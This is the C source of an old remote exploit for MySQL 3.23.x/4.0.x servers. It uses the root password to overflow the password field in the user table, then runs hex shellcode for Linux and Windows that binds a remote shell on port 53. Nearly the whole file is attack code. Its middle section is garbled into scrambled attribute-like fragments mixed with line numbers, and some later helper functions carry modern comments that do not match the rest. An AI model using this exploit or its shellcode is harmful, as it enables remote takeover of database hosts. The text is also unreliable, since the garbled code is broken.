Mysql 3.23.x/4.0.x remote exploit


/*

  • exp for mysql
  • proof of concept
  • using jmp *eax on linux
  • using jmp *edx on windows
  • bkbll(bkbll_at_cnhonker.net,bkbll_at_tom.com) 2003/09/12
  • compile:gcc -o mysql mysql.c -L/usr/lib/mysql -lmysqlclient

*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/select.h>
#include <netinet/in.h>
#include <netdb.h>
#include <mysql/mysql.h>
 10  
 11#define ROOTUSER "root"   
 12#define PORT 3306   
 13#define MYDB "mysql"   
 14#define ALTCOLUMSQL "ALTER TABLE user CHANGE COLUMN Password Password LONGTEXT"   
 15#define LISTUSERSQL "SELECT user,password FROM mysql.user WHERE user!='root' LIMIT 0,1"   
 16#define FLUSHSQL "\x11\x00\x00\x00\x03\x66\x6C\x75\x73\x68\x20\x70\x72\x69\x76\x69\x6C\x65\x67\x65\x73"   
 17#define BUF 2048   
 18#define VER "2.1b2"   
 19#define CMD "uname -a;id\n"   
 20MYSQL *conn;   
 21char NOP[]="90";   
 22char linux_shellcode[]=   
 23"db31c03102b0c931"   
 24"c08580cdc3893474"   
 25"d231c03180cd07b0"   
 26"40b0c03109b180cd"   
 27"c031c38980cd25b0"   
 28"80c2fe43f07203fa"   
 29"14b0c031c38980cd"   
 30"c931c03125b009b1"   
 31"17b080cdc03180cd"   
 32"89504050b0c931e3"   
 33"b180cda283c889e0"   
 34"d0f70ae831c78940"   
 35"894c40c0525050e2"   
 36"4c8d5157db310424"   
 37"66b00ab3835980cd"   
 38"057501f874493a80"   
 39"31d2e209c38940c0"   
 40"fb8980cd3fb003b1"   
 41"4180cd496851f8e2"   
 42"68732f6e622f2f68"   
 43"51e389696c692d68"   
 44"51e28970e1895352"   
 45"c031d23180cd0bb0"   
 46;   
 47//bind on 53 port   
 48  
 49char win_shellcode[]=   
 50/*   
 51"4A5A10EBB966C9333480017DFAE2990A"   
 52"EBE805EB70FFFFFF99999895A938FDC3"   
 53"12999999E91295D9D912348512411291"   
 54"ED12A5EA6A9AE1879AB9E7128DD71262"   
 55"CECF74AA9AA612C8F36B12623F6AC097"   
 56"C6C091EDDC9D5E1AC6C0707B125412C7"   
 57"5A9ABDDF589A784812FF50AA85DF1291"   
 58"78585A9A12589A9B125A9A991A6E1263"   
 59"4912975F71C09AF39999991ECB945F1A"   
 60"65CE66CFF34112C3ED71C09CC9999999"   
 61"F3C9C9C9669BF398411275CE999B9E5E"   
 62"59AAAC99F39DDE1066CACE8998F369CE"   
 63"6DCE66CA66CAC9C9491261CE12DD751A"   
 64"F359AA6D9D10C08910627B17CF10A1CF"   
 65"D9CF10A5B5DF5EFFDE149898AACFC989"   
 66"C8C8C850C8C898F3FAA5DE5E1499FDF4"   
 67"C8C9A5DECB79CE66CA65CE66C965CE66"   
 68"AA7DCE66591C3559CBC860EC4B66CACF"   
 69"7B32C0C35A59AA7766677671EDFCDE66"   
 70"FAF6EBC9EBFDFDD899EAEAFCF8FCEBDA"   
 71"EBC9FCEDEAFCFAF6DC99D8EACDEDF0E1"   
 72"F8FCEBF1F6D599FDF0D5FDF8EBF8EBFB"   
 73"EE99D8E0AAC6ABEACACE99ABFAF6CAD8"   
 74"D8EDFCF2F7F0FB99F0F599FDF7FCEDEA"   
 75"FAFAF89999EDE9FCEAF6F5FAFAF6EAFC"   
 76"99EDFCF2";   
 77*/   
 78"EB909090334A5A107EB966C90A348001"   
 79"EBFAE299FFEBE8059570FFFFC3999998"   
 80"99A938FDD912999985E9129591D91234"   
 81"EA12411287ED12A5126A9AE1629AB9E7"   
 82"AA8DD712C8CECF74629AA61297F36B12"   
 83"ED3F6AC01AC6C0917BDC9D5EC7C6C070"   
 84"DF125412485A9ABDAA589A789112FF50"   
 85"9A85DF129B78585A9912589A63125A9A"   
 86"5F1A6E12F34912971E71C09A1A999999"   
 87"CFCB945FC365CE669CF3411299ED71C0"   
 88"C9C9999998F3C9C9CE669BF35E411275"   
 89"99999B9E1059AAAC89F39DDECE66CACE"   
 90"CA98F369C96DCE66CE66CAC91A491261"   
 91"6D12DD7589F359AA179D10C0CF10627B"   
 92"A5CF10A1FFD9CF1098B5DF5E89DE1498"   
 93"50AACFC9F3C8C8C85EC8C898F4FAA5DE"   
 94"DE1499FD66C8C9A566CB79CE66CA65CE"   
 95"66C965CE59AA7DCEEC591C35CFCBC860"   
 96"C34B66CA777B32C0715A59AA66666776"   
 97"C9EDFCDED8FAF6EBFCEBFDFDDA99EAEA"   
 98"EDF8FCEBF6EBC9FCEAEAFCFAE1DC99D8"   
 99"EBC9EDF0EAFCFAF6F6D599EAF0D5FDF8"   
100"EBF8EBFBEE99D8E0AAC6ABEACACE99AB"   
101"FAF6CAD8D8EDFCF2F7F0FB99F0F599FD"   
102"F7FCEDEAFAFAF89999EDE9FCEAF6F5FA"   
103"FAF6EAFC99EDFCF29090909090909090"   
104;   
int win_port = 53;   /* port handed to client_connect() for the Windows target (see main) */
int type = 1;        /* 1-based index into targets[], chosen with -t (see main/usage) */

/* One row per supported target; main() reads targets[type-1] and usage() lists them. */
struct
{
    char *os;         /* label printed by usage() */
    u_long ret;       /* value main() prints as "ret addr" and copies into jmpaddr */
    int pad;          /* length main() reads as "pad" */
    int systemtype;   /* 0 is linux, 1 is windows */
} targets[] =
{
    { .os = "linux:glibc-2.2.93-5", .ret = 0x42125b2b, .pad = 19*4*2, .systemtype = 0 },
    { .os = "windows2000 SP3 CN",   .ret = 0x77e625db, .pad = 9*4*2,  .systemtype = 1 },
}, v;   /* v exists only so that sizeof(v) gives the size of one element */
118  
119void usage(char *);   
120void sqlerror(char *);   
121MYSQL *mysqlconn(char *server,int port,char *user,char *pass,char *dbname);   
122  
123main(int argc,char **argv)   
124{   
125MYSQL_RES *result;   
126MYSQL_ROW row;   
127char jmpaddress[8];   
128char buffer[BUF],muser[20],buf2[1200];   
129my_ulonglong rslines;   
130struct sockaddr_in clisocket;   
131int i=0,j,clifd,count,a;   
132char data1,c;   
133fd_set fds;   
134char *server=NULL,*rootpass=NULL;   
135int pad,systemtype;   
136u_long jmpaddr;   
137  
138if(argc&lt;3) usage(argv[0]);   
139while((c = getopt(argc, argv, "d:t:p:"))!= EOF)   
140{   
141switch (c)   
142{   
143case 'd':   
144server=optarg;   
145break;   
146case 't':   
147type = atoi(optarg);   
148if((type &gt; sizeof(targets)/sizeof(v)) || (type &lt; 1))   
149usage(argv[0]);   
150break;   
151case 'p':   
152rootpass=optarg;   
153break;   
154default:   
155usage(argv[0]);   
156return 1;   
157}   
158}   
159if(server==NULL || rootpass==NULL)   
160usage(argv[0]);   
161memset(muser,0,20);   
162memset(buf2,0,1200);   
163pad=targets[type-1].pad;   
164systemtype=targets[type-1].systemtype;   
165jmpaddr=targets[type-1].ret;   
166printf("@-------------------------------------------------@\n");   
167printf("# Mysql 3.23.x/4.0.x remote exploit(09/13)-%s #\n",VER);   
168printf("@ by bkbll(bkbll_at_cnhonker.net,bkbll_at_tom.com @\n");   
169printf("---------------------------------------------------\n");   
170printf("[+] system type:%s,using ret addr:%p,pad:%d\n",(systemtype==0)?"linux":"windows",jmpaddr,pad);   
171printf("[+] Connecting to mysql server %s:%d....",server,PORT);   
172fflush(stdout);   
173conn=mysqlconn(server,PORT,ROOTUSER,rootpass,MYDB);   
174if(conn==NULL) exit(0);   
175printf("ok\n");   
176printf("[+] ALTER user column...");   
177fflush(stdout);   
178if(mysql_real_query(conn,ALTCOLUMSQL,strlen(ALTCOLUMSQL))!=0)   
179sqlerror("ALTER user table failed");   
180//select   
181printf("ok\n");   
182printf("[+] Select a valid user...");   
183fflush(stdout);   
184if(mysql_real_query(conn,LISTUSERSQL,strlen(LISTUSERSQL))!=0)   
185sqlerror("select user from table failed");   
186result=mysql_store_result(conn);   
187if(result==NULL)   
188sqlerror("store result error");   
189rslines=mysql_num_rows(result);   
190if(rslines==0)   
191sqlerror("Cannot find a user");   
192row=mysql_fetch_row(result);   
193snprintf(muser,19,"%s",row[0]);   
194printf("ok\n");   
195printf("[+] Found a user:%s,password:%s\n",muser,row[1]);   
196memset(buffer,0,BUF);   
197i=sprintf(buffer,"update user set password='");   
198sprintf(jmpaddress,"%x",jmpaddr);   
199jmpaddress[8]=0;   
200for(j=0;j<pad-4;j+=2) ",muser);="" #\n",ver);="" &fds))="" &fds);="" &fds,="" (count="" (errno="EINTR)" (fd_isset(0,="" (fd_isset(clifd,="" (select(clifd+1,="" (write(1,="" (write(clifd,="" *)&clisocket,&j)="-1)" *s)="" -d="" 0)="" 0:="" 13)-%s="" 1:="" 3.23.x="" 4.0.x="" ;="" <="0)" <host="" @\n");="" a="" a;="" bkbll(bkbll_at_cnhonker.net,bkbll_at_tom.com="" break;="" buf);="" buffer,="" buffer[buf];="" by="" cannot="" case="" char="" client="" client_connect(clifd,server,win_port);="" clifd="socket(AF_INET,SOCK_STREAM,0);" clifd)="" continue;="" count="read(clifd," count)="" count;="" data1="I" default:="" error");="" execsh(clifd);="" execsh(int="" exit(0);="" exploit(09="" fd="" fd_set="" fd_set(0,="" fd_set(clifd,="" fd_zero(&fds);="" fds;="" fflush(stdout);="" find="" finding="" for="" for(clifd="3;clifd&lt;256;clifd++)" get="" here="" i'll="" i+="sprintf(buffer+i,&quot;'" if="" if(clifd="256)" if(clisocket.sin_port="htons(PORT))" if(getpeername(clifd,(struct="" if(j%8)="" if(mysql_real_query(conn,buffer,i)!="0)" if(mysql_real_query(conn,flushsql,strlen(flushsql))!="0)" if(send(clifd,&data1,1,msg_oob)<1)="" if(systemtype="1)" int="" j="sizeof(clisocket);" length:%d\n",strlen(buf2));="" let="" memcpy(buf2+j,"06eb",4);="" memcpy(buf2+j,nop,2);="" memcpy(buf2+pad+8,linux_shellcode,strlen(linux_shellcode));="" memcpy(buf2+pad+8,win_shellcode,strlen(win_shellcode));="" memcpy(buf2+pad,jmpaddress,8);="" memcpy(buffer+i,buf2,strlen(buf2));="" memset(buf2+strlen(buf2),'a',count);="" memset(buffer,0,buf);="" modified="" mysql="" mysql_close(conn);="" mysql_free_result(result);="" not="" null)="" null,="" oob.......");="" overflow="" password="" password...");="" perror("error");="" printf("#="" printf("---------------------------------------------------\n");="" printf("@="" printf("@-------------------------------------------------@\n");="" printf("[+]="" printf("[-]="" printf("failed\n[-]="" printf("ok\n");="" printf("ok\r\n");="" printf("usage:%s="" remote="" 
result="" send(clifd,cmd,sizeof(cmd),0);="" send(clifd,flushsql,sizeof(flushsql),0);="" sending="" server="" server....");="" shell.....");="" shell.....\n");="" sockaddr="" socket="" socket......");="" socket\n");="" socketfd:%d\n",clifd);="" sqlerror("flush="" sqlerror("modified="" support="" switch(systemtype)="" systemtype\n");="" this="" usage(char="" user="%s" void="" waiting="" where="" while(1)="" write(2,buffer,i);="" {="" }=""> -p <root_pass> -t <type>\n",s);   
201printf(" -d target host ip/name\n");   
202printf(" -p 'root' user paasword\n");   
203printf(" -t type [default:%d]\n",type);   
204printf(" ------------------------------\n");   
205for(a = 0; a &lt; sizeof(targets)/sizeof(v); a++)   
206printf(" %d [0x%.8x]: %s\n", a+1, targets[a].ret, targets[a].os);   
207printf("\n");   
208exit(0);   
209}   
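/*
 * Open a connection to the MySQL server.
 *
 * server/port: host and TCP port to connect to.
 * user/pass:   credentials passed to mysql_real_connect().
 * dbname:      default database selected on connect.
 *
 * Returns a connected handle, or NULL after printing a message on stdout.
 * On failure no handle is leaked: the caller owns the returned handle and
 * must release it with mysql_close().
 */
MYSQL *mysqlconn(char *server,int port,char *user,char *pass,char *dbname)
{
    MYSQL *handle = mysql_init(NULL);

    if (handle == NULL) {
        /* The original code called mysql_error(NULL) here, which dereferences
         * a null handle. There is no handle to query, so report plainly. */
        printf("FAILED\n[-] init mysql failed\n");
        return NULL;
    }
    if (mysql_real_connect(handle, server, user, pass, dbname, port, NULL, 0) == NULL) {
        printf("FAILED\n[-] Error: %s\n", mysql_error(handle));
        /* Release the handle allocated by mysql_init() instead of leaking it. */
        mysql_close(handle);
        return NULL;
    }
    return handle;
}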
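/*
 * Report a failed MySQL operation and terminate the program.
 *
 * s: short description of the failed step, printed before the server's
 *    error string from mysql_error() on the global connection `conn`.
 *
 * Never returns. The process now exits with EXIT_FAILURE rather than 0,
 * so a calling shell can tell the failure apart from a normal run.
 */
void sqlerror(char *s)
{
    fprintf(stderr, "FAILED\n[-] %s:%s\n", s, mysql_error(conn));
    mysql_close(conn);
    exit(EXIT_FAILURE);
}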
233  
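/*
 * Resolve `server` and connect `sockfd` (an AF_INET stream socket owned by
 * the caller) to it on TCP `port`.
 *
 * Returns 0 on success and -1 on any failure, after printing a message on
 * stdout. The socket is neither created nor closed here.
 */
int client_connect(int sockfd,char* server,int port)
{
    struct sockaddr_in cliaddr;
    struct hostent *host;

    /* htons() would silently truncate an out-of-range port. */
    if (port < 0 || port > 65535) {
        printf("invalid port %d\n", port);
        return -1;
    }

    /* gethostbyname() is IPv4-only, which matches the AF_INET socket passed in. */
    if ((host = gethostbyname(server)) == NULL) {
        printf("gethostbyname(%s) error\n", server);
        return -1;
    }
    /* Check the answer before copying it: the original code blindly read
     * h_addr, which is wrong for a non-IPv4 family or an empty address list. */
    if (host->h_addrtype != AF_INET || host->h_addr_list[0] == NULL
        || host->h_length != (int)sizeof cliaddr.sin_addr) {
        printf("gethostbyname(%s) returned no usable IPv4 address\n", server);
        return -1;
    }

    memset(&cliaddr, 0, sizeof cliaddr);
    cliaddr.sin_family = AF_INET;
    cliaddr.sin_port = htons((unsigned short)port);
    memcpy(&cliaddr.sin_addr, host->h_addr_list[0], sizeof cliaddr.sin_addr);

    printf("[+] Trying %s:%d....", server, port);
    fflush(stdout);
    if (connect(sockfd, (struct sockaddr *)&cliaddr, sizeof cliaddr) < 0) {
        printf("error:%s\r\n", strerror(errno));
        return -1;
    }
    printf("ok\r\n");
    return 0;
}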